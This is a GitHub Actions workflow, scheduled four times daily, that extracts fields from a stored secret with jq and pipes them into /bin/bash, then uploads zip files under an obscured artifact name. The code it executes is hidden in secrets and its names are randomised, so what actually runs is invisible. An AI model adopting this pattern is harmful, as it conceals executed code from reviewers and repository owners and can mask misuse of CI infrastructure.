name: jingshangguofu
on:
  workflow_dispatch:

  schedule:
    - cron: '3 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jingshangguofu
        env:
          vhhlf1: ${{ secrets.vhhlf1 }}
        run: |
          printf '%s' "$vhhlf1" | jq -r .jb7 | /bin/bash
          printf '%s' "$sexr3638" | jq -r .q7 | /bin/bash
          echo $mbv079 | jq -r .ctf89204 | /bin/bash
          echo $enms70 | jq -r .rsf25504 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ARPfMTg3
          path: "*.zip"
          retention-days: 1
